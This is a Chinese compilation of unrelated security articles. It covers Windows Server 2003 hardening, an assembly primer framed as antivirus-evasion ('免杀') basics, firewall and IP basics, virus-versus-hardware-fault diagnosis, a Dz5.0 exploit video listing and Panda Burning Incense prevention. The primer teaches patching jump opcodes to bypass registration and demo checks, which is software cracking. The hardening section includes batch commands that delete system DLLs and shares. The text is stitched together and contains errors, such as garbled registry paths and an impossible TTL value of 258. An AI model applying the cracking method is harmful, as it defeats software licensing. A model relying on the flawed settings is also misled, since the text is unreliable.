去掉所有的Duplicate User用户、测试用户、共享用户等等。用户组策略设置相应权限,并且经常检查系统的用户,删除已经不再使用的用户。这些用户很多时候都是黑客们入侵系统的突破口。
3、把系统Administrator账号改名
大家都知道,Windows 2003 的Administrator用户是不能被停用的,这意味着别人可以一遍又一遍地尝试这个用户的密码。尽量把它伪装成普通用户,比如改成Guesycludx。
4、创建一个陷阱用户
什么是陷阱用户?即创建一个名为“Administrator”的本地用户,把它的权限设置成最低,什么事也干不了的那种,并且加上一个超过10位的超级复杂密码。这样可以让那些 Hacker们忙上一段时间,借此发现它们的入侵企图。
5、把共享文件的权限从Everyone组改成授权用户
任何时候都不要把共享文件的用户设置成“Everyone”组,包括打印共享,默认的属性就是“Everyone”组的,一定不要忘了改。
6、开启用户策略
使用用户策略,分别设置复位用户锁定计数器时间为20分钟,用户锁定时间为20分钟,用户锁定阈值为3次。 (该项为可选)
7、不让系统显示上次登录的用户名
默认情况下,登录对话框中会显示上次登录的用户名。这使得别人可以很容易地得到系统的一些用户名,进而做密码猜测。修改注册表可以不让对话框里显示上次登录的用户名。方法为:打开注册表编辑器并找到注册表“HKLM\Software\Microsoft\Windows T\CurrentVersion\Winlogon\Dont-DisplayLastUserName”,把REG_SZ的键值改成1。
密码安全设置
1、使用安全密码
一些公司的管理员创建账号的时候往往用公司名、计算机名做用户名,然后又把这些用户的密码设置得太简单,比如“welcome”等等。因此,要注意密码的复杂性,还要记住经常改密码。
2、设置屏幕保护密码
这是一个很简单也很有必要的操作。设置屏幕保护密码也是防止内部人员破坏服务器的一个屏障。
3、开启密码策略
注意应用密码策略,如启用密码复杂性要求,设置密码长度最小值为6位 ,设置强制密码历史为5次,时间为42天。
4、考虑使用智能卡来代替密码
对于密码,总是使安全管理员进退两难,密码设置简单容易受到黑客的攻击,密码设置复杂又容易忘记。如果条件允许,用智能卡来代替复杂的密码是一个很好的解决方法。
三、系统权限的设置
1、磁盘权限
系统盘及所有磁盘只给 Administrators 组和 SYSTEM 的完全控制权限
系统盘\Documents and Settings 目录只给 Administrators 组和 SYSTEM 的完全控制权限
系统盘\Documents and Settings\All Users 目录只给 Administrators 组和 SYSTEM 的完全控制权限
系统盘\Windows\System32\cacls.exe、cmd.exe、net.exe、net1.exe、ftp.exe、tftp.exe、telnet.exe 、 netstat.exe、regedit.exe、at.exe、attrib.exe、format.com、del文件只给 Administrators 组和SYSTEM 的完全 控制权限
另将<systemroot>\System32\cmd.exe、format.com、ftp.exe转移到其他目录或更名
Documents and Settings下所有些目录都设置只给adinistrators权限。并且要一个一个目录查看,包括下面的所有子目录。
删除c:\inetpub目录
2、本地安全策略设置
开始菜单—>管理工具—>本地安全策略
A、本地策略——>审核策略
审核策略更改 成功 失败
审核登录事件 成功 失败
审核对象访问 失败
审核过程跟踪 无审核
审核目录服务访问 失败
审核特权使用 失败
审核系统事件 成功 失败
审核账户登录事件 成功 失败
审核账户管理 成功 失败
B、本地策略——>用户权限分配
关闭系统:只有Administrators组、其它全部删除。
通过终端服务允许登陆:只加入Administrators,Remote Desktop Users组,其他全部删除
C、本地策略——>安全选项
交互式登陆:不显示上次的用户名 启用
网络访问:不允许SAM帐户和共享的匿名枚举 启用
网络访问:不允许为网络身份验证储存凭证 启用
网络访问:可匿名访问的共享 全部删除
网络访问:可匿名访问的命 全部删除
网络访问:可远程访问的注册表路径 全部删除
网络访问:可远程访问的注册表路径和子路径 全部删除
帐户:重命名来宾帐户 重命名一个帐户
帐户:重命名系统管理员帐户 重命名一个帐户
3、禁用不必要的服务 开始-运行-services.msc
TCP/IPNetBIOS Helper提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解析的支持而使用户能够共享
文件、打印和登录到网络
Server支持此计算机通过网络的文件、打印、和命名管道共享
Computer Browser 维护网络上计算机的最新列表以及提供这个列表
Task scheduler 允许程序在指定时间运行
Messenger 传输客户端和服务器之间的 NET SEND 和 警报器服务消息
Distributed File System: 局域网管理共享文件,不需要可禁用
Distributed linktracking client:用于局域网更新连接信息,不需要可禁用
Error reporting service:禁止发送错误报告
Microsoft Serch:提供快速的单词搜索,不需要可禁用
NTLMSecuritysupportprovide:telnet服务和Microsoft Serch用的,不需要可禁用
PrintSpooler:如果没有打印机可禁用
Remote Registry:禁止远程修改注册表
Remote Desktop Help Session Manager:禁止远程协助
Workstation 关闭的话远程NET命令列不出用户组
以上是在Windows Server 2003 系统上面默认启动的服务中禁用的,默认禁用的服务如没特别需要的话不要启动。
4、修改注册表
修改注册表,让系统更强壮
1、隐藏重要文件/目录可以修改注册表实现完全隐藏
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ Current-Version\Explorer\Advanced\Folder\Hi-dden\SHOWALL”,鼠标右击 “CheckedValue”,选择修改,把数值由1改为0
2、防止SYN洪水攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
新建DWORD值,名为SynAttackProtect,值为2
新建EnablePMTUDiscovery REG_DWORD 0
新建NoNameReleaseOnDemand REG_DWORD 1
新建EnableDeadGWDetect REG_DWORD 0
新建KeepAliveTime REG_DWORD 300,000
新建PerformRouterDiscovery REG_DWORD 0
新建EnableICMPRedirects REG_DWORD 0
3. 禁止响应ICMP路由通告报文
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\interface
新建DWORD值,名为PerformRouterDiscovery 值为0
4. 防止ICMP重定向报文的攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
将EnableICMPRedirects 值设为0
5. 不支持IGMP协议
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
新建DWORD值,名为IGMPLevel 值为0
6、禁止IPC空连接:
cracker可以利用net use命令建立空连接,进而入侵,还有net view,nbtstat这些都是基于空连接的,禁止空连接就好了。
Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 把这个值改成”1”即可。
7、更改TTL值
cracker可以根据ping回的TTL值来大致判断你的操作系统,如:
TTL=107(WINNT);
TTL=108(win2000);
TTL=127或128(win9x);
TTL=240或241(linux);
TTL=252(solaris);
TTL=240(Irix);
实际上你可以自己改的:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters:DefaultTTL REG_DWORD 0-0xff(0-255 十进制,默认值128)改成一个莫名其妙的数字如258,起码让那些小菜鸟晕上半天,就此放弃入侵你也不一定哦
8. 删除默认共享
有人问过我一开机就共享所有盘,改回来以后,重启又变成了共享是怎么回事,这是2K为管理而设置的默认共享,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters:AutoShareServer类型是REG_DWORD把值改为0即可
9. 禁止建立空连接
默认情况下,任何用户通过通过空连接连上服务器,进而枚举出帐号,猜测密码。我们可以通过修改注册表来禁止建立空连接:
Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 的值改成”1”即可。
10、建立一个记事本,填上以下代码。保存为*.bat并加到启动项目中
net share c$ /del
net share d$ /del
net share e$ /del
net share f$ /del
net share ipc$ /del
net share admin$ /del
5、IIS站点设置:
1、将IIS目录&数据与系统磁盘分开,保存在专用磁盘空间内。
2、启用父级路径
3、在IIS管理器中删除必须之外的任何没有用到的映射(保留asp等必要映射即可)
4、在IIS中将HTTP404 Object Not Found出错页面通过URL重定向到一个定制HTM文件
5、Web站点权限设定(建议)
读 允许
写 不允许
脚本源访问 不允许
目录浏览 建议关闭
日志访问 建议关闭
索引资源 建议关闭
执行 推荐选择 “仅限于脚本”
6、建议使用W3C扩充日志文件格式,每天记录客户IP地址,用户名,服务器端口,方法,URI字根,HTTP状态,用户代理,而且每天均要审查日志。(最好不要使用缺省的目录,建议更换一个记日志的路径,同时设置日志的访问权限,只允许管理员和system为Full Control)。
7、程序安全:
1) 涉及用户名与口令的程序最好封装在服务器端,尽量少的在ASP文件里出现,涉及到与数据库连接地用户名与口令应给予最小的权限;
2) 需要经过验证的ASP页面,可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个页面。
3) 防止ASP主页.inc文件泄露问题;
4) 防止UE等编辑器生成some.asp.bak文件泄露问题。
6、IIS权限设置的思路
?要为每个独立的要保护的个体(比如一个网站或者一个虚拟目录)创建一个系统用户,让这个站点在系统中具有惟一的可以设置权限的身份。
?在IIS的【站点属性或者虚拟目录属性→目录安全性→匿名访问和验证控制→编辑→匿名访问→编辑】填写刚刚创建的那个用户名。
?设置所有的分区禁止这个用户访问,而刚才这个站点的主目录对应的那个文件夹设置允许这个用户访问(要去掉继承父权限,并且要加上超管组和SYSTEM组)。
7、卸载最不安全的组件
最简单的办法是直接卸载后删除相应的程序文件。将下面的代码保存为一个.BAT文件,( 以下均以 WIN2000 为例,如果使用2003,则系统文件夹应该是 C:\WINDOWS\ )
regsvr32/u C:\WINDOWS\System32\wshom.ocx
del C:\WINDOWS\System32\wshom.ocx
regsvr32/u C:\WINDOWS\system32\shell32.dll
del C:\WINNT\WINDOWS\shell32.dll
然后运行一下,WScript.Shell, Shell.application, WScript.Network就会被卸载了。可能会提示无法删除文件,不用管它,重启一下服务器,你会发现这三个都提示“×安全”了。
汇编”免杀”基础知识总结说明
一.机械码,又称机器码.
ultraedit打开,编辑exe文件时你会看到
许许多多的由0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F组成的数码,这些数码
就是机器码.
修改程序时必须通过修改机器码来修改exe文件.
二.需要熟练掌握的全部汇编知识(只有这么多)
不大容易理解,可先强行背住,混个脸儿熟,以后慢慢的就理解了
cmp a,b 比较a与b
mov a,b 把b的值送给a
ret 返回主程序
nop 无作用,英文“no operation”的简写,意思是“do nothing”(机器码90)***机器码的含义参看上面
(解释:ultraedit打开编辑exe文件时你看到90,等同于汇编语句nop)
call 调用子程序
je 或jz 若相等则跳(机器码74 或0F84)
jne或jnz 若不相等则跳(机器码75或0F85)
jmp 无条件跳(机器码EB)
jb 若小于则跳
ja 若大于则跳
jg 若大于则跳
jge 若大于等于则跳
jl 若小于则跳
jle 若小于等于则跳
pop 出栈
push 压栈
三.常见修改(机器码)
74=>75 74=>90 74=>EB
75=>74 75=>90 75=>EB
jnz->nop
75->90(相应的机器码修改)
jnz -> jmp
75 -> EB(相应的机器码修改)
jnz -> jz
75->74 (正常) 0F 85 -> 0F 84(特殊情况下,有时,相应的机器码修改)
四.两种不同情况的不同修改方法
1.修改为jmp
je(jne,jz,jnz) =>jmp相应的机器码EB (出错信息向上找到的第一个跳转)jmp的作用是绝对跳,无条件跳,从而跳过下面的出错信息
xxxxxxxxxxxx 出错信息,例如:注册码不对,sorry,未注册版不能…,”Function Not Avaible in Demo” 或 ”Command Not Avaible” 或 ”Can’t save in Shareware/Demo”等 (我们希望把它跳过,不让它出现)
。。。
。。。
xxxxxxxxxxxx 正确路线所在
2.修改为nop
je(jne,jz,jnz) =>nop相应的机器码90 (正确信息向上找到的第一个跳转) nop的作用是抹掉这个跳转,使这个跳转无效,失去作用,从而使程序顺利来到紧跟其后的正确信息处
xxxxxxxxxxxx 正确信息,例如:注册成功,谢谢您的支持等(我们希望它不被跳过,让它出现,程序一定要顺利来到这里)
。。。
。。。
xxxxxxxxxxxx 出错信息(我们希望不要跳到这里,不让它出现)它们在存贮器和寄存器、寄存器和输入输出端口之间传送数据.
1. 通用数据传送指令.
MOV 传送字或字节.
MOVSX 先符号扩展,再传送.
MOVZX 先零扩展,再传送.
PUSH 把字压入堆栈.
POP 把字弹出堆栈.
PUSHA 把AX,CX,DX,BX,SP,BP,SI,DI依次压入堆栈.
POPA 把DI,SI,BP,SP,BX,DX,CX,AX依次弹出堆栈.
PUSHAD 把EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI依次压入堆栈.
POPAD 把EDI,ESI,EBP,ESP,EBX,EDX,ECX,EAX依次弹出堆栈.
BSWAP 交换32位寄存器里字节的顺序
XCHG 交换字或字节.( 至少有一个操作数为寄存器,段寄存器不可作为操作数)
CMPXCHG 比较并交换操作数.( 第二个操作数必须为累加器AL/AX/EAX )
XADD 先交换再累加.( 结果在第一个操作数里 )
XLAT 字节查表转换.
── BX 指向一张 256 字节的表的起点, AL 为表的索引值 (0-255,即
0-FFH); 返回 AL 为查表结果. ( [BX+AL]->AL )
2. 输入输出端口传送指令.
IN I/O端口输入. ( 语法: IN 累加器, {端口号│DX} )
OUT I/O端口输出. ( 语法: OUT {端口号│DX},累加器 )
输入输出端口由立即方式指定时, 其范围是 0-255; 由寄存器 DX 指定时,
其范围是 0-65535.
3. 目的地址传送指令.
LEA 装入有效地址.
例: LEA DX,string ;把偏移地址存到DX.
LDS 传送目标指针,把指针内容装入DS.
例: LDS SI,string ;把段地址:偏移地址存到DS:SI.
LES 传送目标指针,把指针内容装入ES.
例: LES DI,string ;把段地址:偏移地址存到ESI.
LFS 传送目标指针,把指针内容装入FS.
例: LFS DI,string ;把段地址:偏移地址存到FSI.
LGS 传送目标指针,把指针内容装入GS.
例: LGS DI,string ;把段地址:偏移地址存到GSI.
LSS 传送目标指针,把指针内容装入SS.
例: LSS DI,string ;把段地址:偏移地址存到SSI.
4. 标志传送指令.
LAHF 标志寄存器传送,把标志装入AH.
SAHF 标志寄存器传送,把AH内容装入标志寄存器.
PUSHF 标志入栈.
POPF 标志出栈.
PUSHD 32位标志入栈.
POPD 32位标志出栈.
二、算术运算指令
ADD 加法.
ADC 带进位加法.
INC 加 1.
AAA 加法的ASCII码调整.
DAA 加法的十进制调整.
SUB 减法.
SBB 带借位减法.
DEC 减 1.
NEC 求反(以 0 减之).
CMP 比较.(两操作数作减法,仅修改标志位,不回送结果).
AAS 减法的ASCII码调整.
DAS 减法的十进制调整.
MUL 无符号乘法.
IMUL 整数乘法.
以上两条,结果回送AH和AL(字节运算),或DX和AX(字运算),
AAM 乘法的ASCII码调整.
DIV 无符号除法.
IDIV 整数除法.
以上两条,结果回送:
商回送AL,余数回送AH, (字节运算);
或 商回送AX,余数回送DX, (字运算).
AAD 除法的ASCII码调整.
CBW 字节转换为字. (把AL中字节的符号扩展到AH中去)
CWD 字转换为双字. (把AX中的字的符号扩展到DX中去)
CWDE 字转换为双字. (把AX中的字符号扩展到EAX中去)
CDQ 双字扩展. (把EAX中的字的符号扩展到EDX中去)
三、逻辑运算指令
AND 与运算.
OR 或运算.
XOR 异或运算.
NOT 取反.
TEST 测试.(两操作数作与运算,仅修改标志位,不回送结果).
SHL 逻辑左移.
SAL 算术左移.(=SHL)
SHR 逻辑右移.
SAR 算术右移.(=SHR)
ROL 循环左移.
ROR 循环右移.
RCL 通过进位的循环左移.
RCR 通过进位的循环右移.
以上八种移位指令,其移位次数可达255次.
移位一次时, 可直接用操作码. 如 SHL AX,1.
移位>1次时, 则由寄存器CL给出移位次数.
如 MOV CL,04
SHL AX,CL
四、串指令
DS:SI 源串段寄存器 :源串变址.
ESI 目标串段寄存器:目标串变址.
CX 重复次数计数器.
AL/AX 扫描值.
D标志 0表示重复操作中SI和DI应自动增量; 1表示应自动减量.
Z标志 用来控制扫描或比较操作的结束.
MOVS 串传送.
( MOVSB 传送字符. MOVSW 传送字. MOVSD 传送双字. )
CMPS 串比较.
( CMPSB 比较字符. CMPSW 比较字. )
SCAS 串扫描.
把AL或AX的内容与目标串作比较,比较结果反映在标志位.
LODS 装入串.
把源串中的元素(字或字节)逐一装入AL或AX中.
( LODSB 传送字符. LODSW 传送字. LODSD 传送双字. )
STOS 保存串.
是LODS的逆过程.
REP 当CX/ECX0时重复.
REPE/REPZ 当ZF=1或比较结果相等,且CX/ECX0时重复.
REPNE/REPNZ 当ZF=0或比较结果不相等,且CX/ECX0时重复.
REPC 当CF=1且CX/ECX0时重复.
REPNC 当CF=0且CX/ECX0时重复.
五、程序转移指令
1>无条件转移指令 (长转移)
JMP 无条件转移指令
CALL 过程调用
RET/RETF过程返回.
2>条件转移指令 (短转移,-128到+127的距离内)
( 当且仅当(SF XOR OF)=1时,OP1循环控制指令(短转移)
LOOP CX不为零时循环.
LOOPE/LOOPZ CX不为零且标志Z=1时循环.
LOOPNE/LOOPNZ CX不为零且标志Z=0时循环.
JCXZ CX为零时转移.
JECXZ ECX为零时转移.
4>中断指令
INT 中断指令
INTO 溢出中断
IRET 中断返回
5>处理器控制指令
HLT 处理器暂停, 直到出现中断或复位信号才继续.
WAIT 当芯片引线TEST为高电平时使CPU进入等待状态.
ESC 转换到外处理器.
LOCK 封锁总线.
NOP 空操作.
STC 置进位标志位.
CLC 清进位标志位.
CMC 进位标志取反.
STD 置方向标志位.
CLD 清方向标志位.
STI 置中断允许位.
CLI 清中断允许位.
六、伪指令
DW 定义字(2字节).
PROC 定义过程.
ENDP 过程结束.
SEGMENT 定义段.
ASSUME 建立段寄存器寻址.
ENDS 段结束.
END 程序结束.
防火墙的定义、类型及使用防火墙的意义
防火墙就是一个位于计算机和它所连接的网络之间的软件或硬件。该计算机流入流出的所有网络通信均要经过此防火墙。
防火墙的功能
防火墙对流经它的网络通信进行扫描,这样能够过滤掉一些攻击,以免其在目标计算机上被执行。防火墙还可以关闭不使用的端口。而且它还能禁止特定端口的流出通信,封锁特洛伊木马。最后,它可以禁止来自特殊站点的访问,从而防止来自不明入侵者的所有通信。
为什么使用防火墙
防火墙具有很好的保护作用。入侵者必须首先穿越防火墙的安全防线,才能接触目标计算机。你可以将防火墙配置成许多不同保护级别。高级别的保护可能会禁止一些服务,如视频流等,但至少这是你自己的保护选择。
防火墙的类型
防火墙有不同类型。一个防火墙可以是硬件自身的一部分,你可以将因特网连接和计算机都插入其中。防火墙也可以在一个独立的机器上运行,该机器作为它背后网络中所有计算机的代理和防火墙。最后,直接连在因特网的机器可以使用个人防火墙。
防火墙的概念
在网络中,所谓“防火墙”,是指一种将内部网和公众访问网(如Internet)分开的方法,它实际上是一种隔离技术。防火墙是在两个网络通讯时执行的一种访问控制尺度,它能允许你“同意”的人和数据进入你的网络,同时将你“不同意”的人和数据拒之门外,最大限度地阻止网络中的黑客来访问你的网络。换句话说,如果不通过防火墙,公司内部的人就无法访问Internet,Internet上的人也无法和公司内部的人进行通信。
防火墙的功能
防火墙是网络安全的屏障:
一个防火墙(作为阻塞点、控制点)能极大地提高一个内部网络的安全性,并通过过滤不安全的服务而降低风险。由于只有经过精心选择的应用协议才能通过防火墙,所以网络环境变得更安全。如防火墙可以禁止诸如众所周知的不安全的NFS协议进出受保护网络,这样外部的攻击者就不可能利用这些脆弱的协议来攻击内部网络。防火墙同时可以保护网络免受基于路由的攻击,如IP选项中的源路由攻击和ICMP重定向中的重定向路径。防火墙应该可以拒绝所有以上类型攻击的报文并通知防火墙管理员。
防火墙可以强化网络安全策略:
通过以防火墙为中心的安全方案配置,能将所有安全软件(如口令、加密、身份认证、审计等)配置在防火墙上。与将网络安全问题分散到各个主机上相比,防火墙的集中安全管理更经济。例如在网络访问时,一次一密口令系统和其它的身份认证系统完全可以不必分散在各个主机上,而集中在防火墙一身上。
对网络存取和访问进行监控审计:
如果所有的访问都经过防火墙,那么,防火墙就能记录下这些访问并作出日志记录,同时也能提供网络使用情况的统计数据。当发生可疑动作时,防火墙能进行适当的报警,并提供网络是否受到监测和攻击的详细信息。另外,收集一个网络的使用和误用情况也是非常重要的。首先的理由是可以清楚防火墙是否能够抵挡攻击者的探测和攻击,并且清楚防火墙的控制是否充足。而网络使用统计对网络需求分析和威胁分析等而言也是非常重要的。
防止内部信息的外泄:
通过利用防火墙对内部网络的划分,可实现内部网重点网段的隔离,从而限制了局部重点或敏感网络安全问题对全局网络造成的影响。再者,隐私是内部网络非常关心的问题,一个内部网络中不引人注意的细节可能包含了有关安全的线索而引起外部攻击者的兴趣,甚至因此而暴漏了内部网络的某些安全漏洞。使用防火墙就可以隐蔽那些透漏内部细节如Finger,DNS等服务。Finger显示了主机的所有用户的注册名、真名,最后登录时间和使用shell类型等。但是Finger显示的信息非常容易被攻击者所获悉。攻击者可以知道一个系统使用的频繁程度,这个系统是否有用户正在连线上网,这个系统是否在被攻击时引起注意等等。防火墙可以同样阻塞有关内部网络中的DNS信息,这样一台主机的域名和IP地址就不会被外界所了解。
IP基础知识 私网IP和公网IP的关联区别
公网ip
用邮寄系统作比喻。有公网ip,相当于说你有一个详细的地址,你可以写信寄给别人,别人也可以用这个地址和你进行各种通讯。
现在来看看没有公网ip是一种什么局面。这就像是住在一个大院里,所有进出邮件都由传达室转交。如果是普通的邮件,可以放在传达室,传达室的大爷大妈看到你了就会转交给你,或者你自己去传达室看看,这不重要,反正虽然经过了一点波折,还是可以看到邮件的。现在假设以下如果来了个挂号,邮局的人员说:必须本人签收。传达室的大爷就说了:对不起,所有的邮件都要经过我中转~。于是邮局的人员只好把信带回去了……
实际情况和这个差不多,所谓没有公网ip,就是说你的机子并非直接连接上internet,而是所有通讯经过一台代理(一般是透明网关)进行中转,这时候问题就来了,就会有一些通讯无法在这种机制下顺利进行。比如两个网吧之间,网吧的机子是没有公网ip的典型例子,通常两个网吧之间就不能互相通过qq传送文件。又比如没有公网ip,上网玩对战游戏通常会有问题,你建立的游戏别人无法加入等等。
私网ip
私网IP就是就是国际上分配ip的时候,留出一部分ip,不用于在internat上用可用于内部局域网等,虽然功能一样,但不能在internat上使用。属于非注册地址,专门为组织机构内部使用。
以下表列出留用的内部寻址地址
A类 10.0.0.0 8
B类 172.16.0.0--172.31.0.0
C类 192.168.0.0--192.168.255.0
查看本机IP的方式:
可以使用ipconfig命令:开始 – 运行 – 输入命令cmd – 在命令行窗口输入命令ipconfig,即可查看本机IP。
巧区别各类电脑问题...是病毒?还是故障?
在清除计算机病毒的过程中, 有些类似计算机病毒的现象纯属由计算机硬件或软件故障引起, 同时有些病毒发作现象又与硬件或软件的故障现象相类似, 如引导型病毒等。这给用户造成了很大的麻烦, 许多用户往往在用各种查解病毒软件查不出病毒时就去格式化硬盘, 不仅影响了硬盘的寿命, 而且还不能从根本上解决问题。所以, 正确区分计算机的病毒与故障是保障计算机系统安全运行的关键。
一、计算机病毒的现象与查解方法
在一般情况下, 计算机病毒总是依附某一系统软件或用户程序进行繁殖和扩散, 病毒发作时危及计算机的正常工作, 破坏数据与程序, 侵犯计算机资源。计算机在感染病毒后, 总是有一定规律地出现异常现象:
①屏幕显示异常, 屏幕显示出不是由正常程序产生的画面或字符串, 屏幕显示混乱;
②程序装入时间增长, 文件运行速度下降;
③用户没有访问的设备出现工作信号;
④磁盘出现莫名其妙的文件和坏块, 卷标发生变化;
⑤系统自行引导;
⑥丢失数据或程序, 文件字节数发生变化;
⑦内存空间、磁盘空间减小;
⑧异常死机;
⑨磁盘访问时间比平时增长;
⑩系统引导时间增长。
如果出现上述现象时, 应首先对系统的BOOT区、IO.SYS、MSDOS.SYS、COMMAND.COM、.COM、.EXE文件进行仔细检查, 并与正确的文件相比较, 如有异常现象则可能感染病毒。然后对其它文件进行检查,有无异常现象, 找出异常现象的原因。病毒与故障的区别的关键是, 一般故障只是无规律的偶然发生一次而病毒的发作总是有规律的。
这里建议使用在DOS6.0以上版本所带的MSAV软件, 它的最突出的功能是能查出所有文件的变化, 并能做出记录。
如果MSAV报告有大量的文件被改动, 则系统可能被病毒感染。
二、与病毒现象类似的硬件故障
硬件的故障范围不太广泛, 但是很容易被确认。在处理计算机的异常现象时很容易被忽略, 只有先排除硬件故障,才是解决问题的根本。
1. 系统的硬件配置
这种故障常在兼容机上发生, 由于配件的不完全兼容, 导致一些软件不能够正常运行。笔者遇到过一台兼容机, 联迅绿色节能主板, 昆腾大脚硬盘, 开始时安装小软件非常顺利, 但是安装WINDOWS时却出现了装不上的故障, 开始也怀疑病毒作怪, 在用了许多杀毒软件后也不能解决问题。后来查阅了一些资料才发现了问题所在, 因主板是节能型的,而CPU、硬盘却不是节能型的, 当安装软件的时间超过主板进入休眠时间的期限时, 主板就进入了休眠状态, 于是就由于主板、CPU、硬盘工作不协调而出现了故障。解决的办法很简单, 把主板的节能开关关掉就一切正常了。所以, 用户在自己组装计算机时应首先考虑配件的兼容性, 购买配件前应仔细阅读产品说明书。
2. 电源电压不稳定
由于计算机所使用的电源的电压不稳定, 容易导致用户文件在磁盘读写时出现丢失或被破坏的现象, 严重时将会引起系统自启动。如果用户所用的电源的电压经常性的不稳定, 为了使您的计算机更安全地工作, 建议您使用电源稳压器或不间断电源(UPS)。
3. 插件接触不良
由于计算机插件接触不良, 会使某些设备出现时好时坏的现象。例如: 显示器信号线与主机接触不良时可能会使显示器显示不稳定; 磁盘线与多功能卡接触不良时会导致磁盘读写时好时坏; 打印机电缆与主机接触不良时会造成打印机不工作或工作现象不正常; 鼠标线与串行口接触不良时会出现鼠标时动时不动的故障等等。
4. 软驱故障
用户如果使用质量低劣的磁盘或使用损坏的、发霉的磁盘, 将会把软驱磁头弄脏, 出现无法读写磁盘或读写出错等故障。遇到这种情况, 只需用清洗盘清洗磁头, 一般情况下都能排队故障。如果污染特别严重, 需要将软驱拆开, 用清洗液手工清洗。
5. 关于CMOS的问题
众所周知, CMOS中所存储的信息对计算机系统来说是十分重要的, 在微机启动时总是先要按CMOS中的信息来检测和初始化系统(当然是最基本的初始化)。在486以上的主板里, 大都有一个病毒监测开关, 用户一般情况下都设置为"ON", 这时如果安装WINDOWS95, 就会发生死机现象。原因是安装WINDOWS95时, 安装程序会修改硬盘的引导部分、系统的内部中断和中断向量表, 而病毒监测程序不允许这样做, 于是就导致了死机。 建议用户在安装新系统时, 先把CMOS中病毒监测开关关掉。另外, 系统的引导速度和一些程序的运行速度减慢也可能与CMOS有关, 因为CMOS的高级设置中有一些影子内存开关, 这也会影响系统的运行速度。
三、与病毒现象类似的软件故障
软件故障的范围比较广泛, 问题出现也比较多。对软件故障的辨认和解决也是一件很难的事情, 它需要用户有相当的软件知识和丰富的上机经验。这里介绍一些常见的症状。
1. 出现"Invalid drive specification"(非法驱动器号)
这个提示是说明用户的驱动器丢失, 如果用户原来拥有这个驱动器, 则可能是这个驱动器的主引导扇区的分区表参数破坏或是磁盘标志50AA被修改。遇到这种情况用DEBUG或NORTON等工具软件将正确的主引导扇区信息写入磁盘的主引导扇区。
2. 软件程序已被破坏(非病毒)
由于磁盘质量等问题, 文件的数据部分丢失, 而这程序还能够运行, 这时使用就会出现不正常现象, 如Format程序被破坏后, 若继续执行, 会格式化出非标准格式的磁盘, 这样就会产生一连串的错误。但是这种问题极为罕见。
3. DOS系统配置不当
DOS操作系统在启动时会去查找其系统配置文件CONFIG.SYS,并按其要求配置运行环境。如果系统环境设置不当会造成某些软件不能正常运行, 如CC++语言系统、AUTOCAD等等。原因是这些程序运行时打开的文件过多, 超过系统默认值。
4. 软件与DOS版本的兼容性
DOS操作系统自身的特点是具有向下的兼容性。但软件却不同,许多软件都要过多地受其环境的限制, 在某个版本下可正常运行的软件, 到另一个DOS版本下却不能正常运行, 许多用户就怀疑是病毒引起的。如旧版的2.13汉字系统, 在DOS 3.30下运行正常, 而在DOS6.2下运行会出现乱码现象。
5. 引导过程故障
系统引导时屏幕显示"Missing operating system"(操作系统丢失), 故障原因是硬盘的主引导程序可完成引导,但无法找到DOS系统的引导记录。造成这种现象的原因是C盘无引导记录及DOS系统文件, 或CMOS中硬盘的类型与硬盘本身的格式化时的类型不同。需要将系统文件传递到C盘上或修改CMOS配置使系统从软盘上引导。
6. 用不同的编辑软件程序
用户用一些编辑软件编辑源程序, 编辑系统会在文件的特殊地方做上一些标记。这样当源程序编译或解释执行时就会出错。例如, 用WPS的N命令编辑的文本文件, 在其头部也有版面参数,有的程序编译或解释系统却不能将之与源程序分辨开, 这样就出现了错误。
7. 有关FOXBASE问题
经常使用FOXBASE的用户可能会发现在磁盘中会生成一些"S"字符或数字命名的文件, 还会发现某些数据库文件数据丢失。这一现象与计算机病毒极为相似, 其实造成这一现象的主要原因是用户在使用FOXBASE后,没有后退到DOS状态就关掉机器, 或在使用FOXBASE中途掉。建议用户在使用FOXBASE后返回到DOS状态后才关机, 否则不但会造成上述现象, 并且会对磁盘造成损坏。
在学习、使用计算机的过程中, 可能还会遇到许许多多与病毒现象相似的软硬件故障, 所以用户要多阅读、参考有关资料, 了解检测病毒的方法, 并注意在学习、工作中积累经验, 就不难区分病毒与软硬件故障了。
[推荐]Dz5.0漏洞的原理和工具的使用以及漏洞修补
动画类型: 投稿动画
运行环境: Win9x/NT/2000/XP/2003
授权方式: 投稿收录
动画大小: 46700 K
动画等级: ★★★
整理时间: 2007-3-12 21:26:17
开 发 商: jackal
***************************************************************************
本动画的MD5值为:
583d03dbc40132ecfd187f4fe6942597 dz.exe
***************************************************************************
动画下载==》》
Windows XP自带的一个罕见的功能
预防第一!熊猫烧香病毒的预防方法
这几天“熊猫烧香”的变种更是表象异常活跃,近半数的网民深受其害。对于已经感染“熊猫烧香”病毒的用户,建议参考《熊猫烧香病毒专杀及手动修复方案》,下载其中的专钉工具进行查杀,也可手动查杀。技术专家还总结了以下预防措施,帮你远离“熊猫烧香”病毒的骚扰。
1、立即检查本机administrator组成员口令,一定放弃简单口令甚至空口令,安全的口令是字母数字特殊字符的组合,自己记得住,别让病毒猜到就行。
修改方法:右键单击“我的电脑”,选择管理,浏览到本地用户和组,在右边的窗中,选择具备管理员权限的用户名,单击右键,选择设置密码,输入新密码就行。
图1 修改Administrator密码
2.、利用组策略,关闭所有驱动器的自动播放功能。
步骤:单击开始,运行,输入gpedit.msc,打开组策略编辑器,浏览到计算机配置,管理模板,系统,在右边的窗格中选择关闭自动播放,该配置缺省是未配置,在下拉框中选择所有驱动器,再选取已启用,确定后关闭。最后,在开始,运行中输入gpupdate,确定后,该策略就生效了。
图2 关闭所有驱动器的自动播放功能
图3 关闭所有驱动器的自动播放功能
3、修改文件夹选项,以查看不明文件的真实属性,避免无意双击骗子程序中毒。
